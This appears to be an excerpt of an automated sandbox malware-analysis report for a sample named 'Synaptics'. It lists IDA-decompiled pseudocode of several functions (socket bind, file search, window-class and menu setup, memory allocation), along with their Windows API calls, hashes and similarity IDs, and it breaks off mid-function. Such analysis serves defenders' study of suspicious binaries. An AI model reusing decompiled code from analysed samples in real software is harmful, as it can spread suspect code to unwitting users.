                                                                                                                                                                                          0x0043f26f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f26f
                                                                                                                                                                                          0x0043f159
                                                                                                                                                                                          0x0043f1f2
                                                                                                                                                                                          0x0043f1f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f1ff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f203
                                                                                                                                                                                          0x0043f20a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f20f
                                                                                                                                                                                          0x0043f213
                                                                                                                                                                                          0x0043f216
                                                                                                                                                                                          0x0043f219
                                                                                                                                                                                          0x0043f21e
                                                                                                                                                                                          0x0043f21f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f21f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f15f
                                                                                                                                                                                          0x0043f12b
                                                                                                                                                                                          0x0043f1a1
                                                                                                                                                                                          0x0043f1aa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f1b9
                                                                                                                                                                                          0x0043f1c8
                                                                                                                                                                                          0x0043f1d5
                                                                                                                                                                                          0x0043f1dc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f1e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f1e2
                                                                                                                                                                                          0x0043f12d
                                                                                                                                                                                          0x0043f130
                                                                                                                                                                                          0x0043f16b
                                                                                                                                                                                          0x0043f16f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f17b
                                                                                                                                                                                          0x0043f183
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f189
                                                                                                                                                                                          0x0043f132
                                                                                                                                                                                          0x0043f133
                                                                                                                                                                                          0x0043f192
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f135
                                                                                                                                                                                          0x0043f138
                                                                                                                                                                                          0x0043f235
                                                                                                                                                                                          0x0043f243
                                                                                                                                                                                          0x0043f24e
                                                                                                                                                                                          0x0043f256
                                                                                                                                                                                          0x0043f261
                                                                                                                                                                                          0x0043f266
                                                                                                                                                                                          0x0043f266
                                                                                                                                                                                          0x0043f256
                                                                                                                                                                                          0x0043f243
                                                                                                                                                                                          0x0043f138

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Capture
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1145282425-3916222277
                                                                                                                                                                                          • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                          • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                                                                                                                                                          • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047C7BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                          			E0047C7BC(void* __eax, char __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t20;
				intOrPtr* _t24;
				void* _t26;
				void* _t28;
				void* _t32;

				_v8 = __ecx;
				_t32 = __edx;
				_t28 = __eax;
				_t33 = _a8;
				_v24 = _v8;
				if(E00404C80(_a8) != 0) {
					_v28 = E0047C3AC(_t28, _t28, _t33);
					_v20 = _v28;
				} else {
					_v20 = 0;
				}
				_t20 =  *0x49d984; // 0x49ece4
				_v22 =  *((intOrPtr*)( *_t20))(_a4);
				_t24 =  *0x49d928; // 0x49ecc4
				_t26 =  *((intOrPtr*)( *_t24))(_t32,  &_v24, 0x10); // executed
				return _t26;
			}















                                                                                                                                                                                          0x0047c7c5
                                                                                                                                                                                          0x0047c7c8
                                                                                                                                                                                          0x0047c7ca
                                                                                                                                                                                          0x0047c7cc
                                                                                                                                                                                          0x0047c7d3
                                                                                                                                                                                          0x0047c7e0
                                                                                                                                                                                          0x0047c7f2
                                                                                                                                                                                          0x0047c7f8
                                                                                                                                                                                          0x0047c7e2
                                                                                                                                                                                          0x0047c7e4
                                                                                                                                                                                          0x0047c7e4
                                                                                                                                                                                          0x0047c800
                                                                                                                                                                                          0x0047c809
                                                                                                                                                                                          0x0047c814
                                                                                                                                                                                          0x0047c81b
                                                                                                                                                                                          0x0047c823

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • bind.WS2_32(?,?,00000010), ref: 0047C81B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: bind
                                                                                                                                                                                          • String ID: I
                                                                                                                                                                                          • API String ID: 1187836755-1966777607
                                                                                                                                                                                          • Opcode ID: 338424bfcf9b443325b13217d0ddfa32753095248967005ccd7384656c09734e
                                                                                                                                                                                          • Instruction ID: d8dcd3f30659037859b9746cd7a4f13db28008142928148337f91f606f628de3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 338424bfcf9b443325b13217d0ddfa32753095248967005ccd7384656c09734e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601EC75A101099F8740DFADD8819EEB7F8EF98610B10403AED18E3310E7709E058BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409B1C Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409B1C(void* __eax, WORD* __ecx, signed int __edx) {
				void* _t8;
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t8 = FindFirstFileA(E00404E80(__eax), __ecx + 0x18); // executed
				_t21 = _t8;
				 *(_t15 + 0x14) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00409AB8(_t15);
					if(_t22 != 0) {
						E00409B90(_t15);
					}
				}
				return _t22;
			}







                                                                                                                                                                                          0x00409b1f
                                                                                                                                                                                          0x00409b28
                                                                                                                                                                                          0x00409b37
                                                                                                                                                                                          0x00409b3c
                                                                                                                                                                                          0x00409b3e
                                                                                                                                                                                          0x00409b44
                                                                                                                                                                                          0x00409b61
                                                                                                                                                                                          0x00409b46
                                                                                                                                                                                          0x00409b4d
                                                                                                                                                                                          0x00409b51
                                                                                                                                                                                          0x00409b55
                                                                                                                                                                                          0x00409b55
                                                                                                                                                                                          0x00409b51
                                                                                                                                                                                          0x00409b68

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE,?,?,022B2A8C,022B2A8C), ref: 00409B37
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE,?,?,022B2A8C,022B2A8C), ref: 00409B5C
                                                                                                                                                                                            • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                            • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                            • Part of subcall function 00409B90: FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 976985129-0
                                                                                                                                                                                          • Opcode ID: 3e75097ecda1ea3253092f31a1e70b9f4d0e684efd658f6c4eb41b883134c2c9
                                                                                                                                                                                          • Instruction ID: 79fd7835e2b2924360e3ee9b5121bf30e16e58b6cc0e4d1406ffac342d6b08ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e75097ecda1ea3253092f31a1e70b9f4d0e684efd658f6c4eb41b883134c2c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E03962F0122007C7156A7E688159A65DC6A85778349037FF914FB3C7D63CEC0643E9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004598AC Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                          			E004598AC(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00407540(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                                                                                                                                          0x004598b8
                                                                                                                                                                                          0x004598c2
                                                                                                                                                                                          0x004598cb
                                                                                                                                                                                          0x004598d2
                                                                                                                                                                                          0x004598d5
                                                                                                                                                                                          0x004598d6
                                                                                                                                                                                          0x004598e1
                                                                                                                                                                                          0x004598e5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                          • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                          • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401EA8 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401EA8(intOrPtr* __eax, signed int __edx) {
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				signed int _t29;
				intOrPtr _t30;

				_t24 = __eax;
				 *((intOrPtr*)(__eax + 8)) = __edx;
				 *((intOrPtr*)(__eax + __edx - 0xc + 8)) = __edx;
				if(__edx <= 0x1000) {
					_t28 = __edx;
					if(__edx < 0) {
						_t28 = __edx + 3;
					}
					_t29 = _t28 >> 2;
					_t21 =  *0x49e624; // 0x7f2780
					_t22 =  *((intOrPtr*)(_t21 + _t29 * 4 - 0xc));
					if(_t22 != 0) {
						_t30 =  *_t22;
						 *((intOrPtr*)(_t24 + 4)) = _t22;
						 *_t24 = _t30;
						 *_t22 = _t24;
						 *((intOrPtr*)(_t30 + 4)) = _t24;
						return _t22;
					} else {
						_t23 =  *0x49e624; // 0x7f2780
						 *((intOrPtr*)(_t23 + _t29 * 4 - 0xc)) = _t24;
						 *((intOrPtr*)(_t24 + 4)) = _t24;
						 *_t24 = _t24;
						return _t23;
					}
				}
				if(__edx < 0x3c00) {
					L8:
					_t18 =  *0x49e618; // 0x22e030c
					 *0x49e618 = _t24;
					_t26 =  *_t18;
					 *((intOrPtr*)(_t24 + 4)) = _t18;
					 *_t24 = _t26;
					 *_t18 = _t24;
					 *((intOrPtr*)(_t26 + 4)) = _t24;
					return _t18;
				}
				_t20 = E00401DF8(__eax, __edx); // executed
				if(_t20 == 0) {
					goto L8;
				}
				return _t20;
			}












                                                                                                                                                                                          0x00401eaf
                                                                                                                                                                                          0x00401eb1
                                                                                                                                                                                          0x00401ebb
                                                                                                                                                                                          0x00401ec4
                                                                                                                                                                                          0x00401ec6
                                                                                                                                                                                          0x00401eca
                                                                                                                                                                                          0x00401ecc
                                                                                                                                                                                          0x00401ecc
                                                                                                                                                                                          0x00401ecf
                                                                                                                                                                                          0x00401ed2
                                                                                                                                                                                          0x00401ed7
                                                                                                                                                                                          0x00401edd
                                                                                                                                                                                          0x00401eef
                                                                                                                                                                                          0x00401ef1
                                                                                                                                                                                          0x00401ef4
                                                                                                                                                                                          0x00401ef6
                                                                                                                                                                                          0x00401ef8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401edf
                                                                                                                                                                                          0x00401edf
                                                                                                                                                                                          0x00401ee4
                                                                                                                                                                                          0x00401ee8
                                                                                                                                                                                          0x00401eeb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401eeb
                                                                                                                                                                                          0x00401edd
                                                                                                                                                                                          0x00401f03
                                                                                                                                                                                          0x00401f12
                                                                                                                                                                                          0x00401f12
                                                                                                                                                                                          0x00401f17
                                                                                                                                                                                          0x00401f1d
                                                                                                                                                                                          0x00401f1f
                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                          0x00401f24
                                                                                                                                                                                          0x00401f26
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401f26
                                                                                                                                                                                          0x00401f09
                                                                                                                                                                                          0x00401f10
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401f2c

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f04ea4c61aad4814f2bdfc2d310b52959fc1f5fe19347b54eed73f048007eeab
                                                                                                                                                                                          • Instruction ID: 862bd26b3f036b1ea5a8195c31d39dec9588fa13b7c1437b3fb7a7febbaa52fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: f04ea4c61aad4814f2bdfc2d310b52959fc1f5fe19347b54eed73f048007eeab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7611F3B1A012218FD711CF4AD9C0A05BBEAFBA9305759C1BBE848DF369D338D8419B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004593B4 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132windowregistryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                          			E004593B4(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x459555);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x45955c);
					return E004049C0( &_v48);
				}
				_t22 =  *0x49dc84; // 0x49e04c
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00422BCC(E00459934, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x49bf54 = L00407540;
				_t26 =  *0x49bf74; // 0x45909c
				_t27 =  *0x49e668; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x49e668; // 0x400000
					 *0x49bf60 = _t62;
					_t88 = RegisterClassA(0x49bf50);
					if(_t88 == 0) {
						_t64 =  *0x49d7fc; // 0x422f20
						E00406A70(_t64,  &_v48);
						E0040D144(_v48, 1);
						E00404378();
					}
				}
				_t29 =  *0x49d970; // 0x49e900
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x49d970; // 0x49e900
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x49e668; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x96000045
				_t39 = E00404E80( *_t7);
				_t40 =  *0x49bf74; // 0x45909c, executed
				_t41 = E00407AE4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45150c
				E004049C0(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x49da40; // 0x49eb1c
				if( *_t47 != 0) {
					_t55 = E0045A038(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0045A038(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x49da40; // 0x49eb1c
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                                                                                                                                                                          0x004593bd
                                                                                                                                                                                          0x004593c0
                                                                                                                                                                                          0x004593c4
                                                                                                                                                                                          0x004593c5
                                                                                                                                                                                          0x004593ca
                                                                                                                                                                                          0x004593cd
                                                                                                                                                                                          0x004593d7
                                                                                                                                                                                          0x0045953f
                                                                                                                                                                                          0x00459541
                                                                                                                                                                                          0x00459544
                                                                                                                                                                                          0x00459547
                                                                                                                                                                                          0x00459554
                                                                                                                                                                                          0x00459554
                                                                                                                                                                                          0x004593dd
                                                                                                                                                                                          0x004593e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004593f1
                                                                                                                                                                                          0x004593f6
                                                                                                                                                                                          0x004593fe
                                                                                                                                                                                          0x00459407
                                                                                                                                                                                          0x0045940d
                                                                                                                                                                                          0x0045941a
                                                                                                                                                                                          0x0045941c
                                                                                                                                                                                          0x00459421
                                                                                                                                                                                          0x00459430
                                                                                                                                                                                          0x00459433
                                                                                                                                                                                          0x00459438
                                                                                                                                                                                          0x0045943d
                                                                                                                                                                                          0x0045944c
                                                                                                                                                                                          0x00459451
                                                                                                                                                                                          0x00459451
                                                                                                                                                                                          0x00459433
                                                                                                                                                                                          0x00459458
                                                                                                                                                                                          0x00459461
                                                                                                                                                                                          0x00459463
                                                                                                                                                                                          0x00459465
                                                                                                                                                                                          0x00459465
                                                                                                                                                                                          0x0045946b
                                                                                                                                                                                          0x00459474
                                                                                                                                                                                          0x00459476
                                                                                                                                                                                          0x00459478
                                                                                                                                                                                          0x00459478
                                                                                                                                                                                          0x0045947b
                                                                                                                                                                                          0x0045947c
                                                                                                                                                                                          0x0045947e
                                                                                                                                                                                          0x00459480
                                                                                                                                                                                          0x00459482
                                                                                                                                                                                          0x00459484
                                                                                                                                                                                          0x00459489
                                                                                                                                                                                          0x0045948a
                                                                                                                                                                                          0x0045948c
                                                                                                                                                                                          0x00459492
                                                                                                                                                                                          0x0045949e
                                                                                                                                                                                          0x004594a3
                                                                                                                                                                                          0x004594a8
                                                                                                                                                                                          0x004594ab
                                                                                                                                                                                          0x004594b1
                                                                                                                                                                                          0x004594b6
                                                                                                                                                                                          0x004594bd
                                                                                                                                                                                          0x004594c3
                                                                                                                                                                                          0x004594c7
                                                                                                                                                                                          0x004594cc
                                                                                                                                                                                          0x004594d4
                                                                                                                                                                                          0x004594d8
                                                                                                                                                                                          0x004594e5
                                                                                                                                                                                          0x004594e9
                                                                                                                                                                                          0x004594f0
                                                                                                                                                                                          0x004594f8
                                                                                                                                                                                          0x004594fc
                                                                                                                                                                                          0x004594fc
                                                                                                                                                                                          0x00459503
                                                                                                                                                                                          0x0045950c
                                                                                                                                                                                          0x00459516
                                                                                                                                                                                          0x00459523
                                                                                                                                                                                          0x00459528
                                                                                                                                                                                          0x00459530
                                                                                                                                                                                          0x0045953a
                                                                                                                                                                                          0x0045953a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0042F4BC,00000000,?,00422D23,?,00000001,00000000,00400000,00000000,00000000,00000000), ref: 00422BEA
                                                                                                                                                                                          • GetClassInfoA.USER32 ref: 00459413
                                                                                                                                                                                          • RegisterClassA.USER32 ref: 0045942B
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 004594C7
                                                                                                                                                                                          • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                                                                                                                                                          • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                                                                                                                                                          • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                                                                          • String ID: /B$@u@$LI
                                                                                                                                                                                          • API String ID: 2103932818-2136969242
                                                                                                                                                                                          • Opcode ID: bd62eb8efd44c5fbe65232f130f23d9c31847c0ef814a65736a06bb0055ce4f5
                                                                                                                                                                                          • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd62eb8efd44c5fbe65232f130f23d9c31847c0ef814a65736a06bb0055ce4f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00446330 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00446330(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x4464a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A14(0x49eb28, _v8);
				_t25 =  *0x49eb28; // 0x22b1290
				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
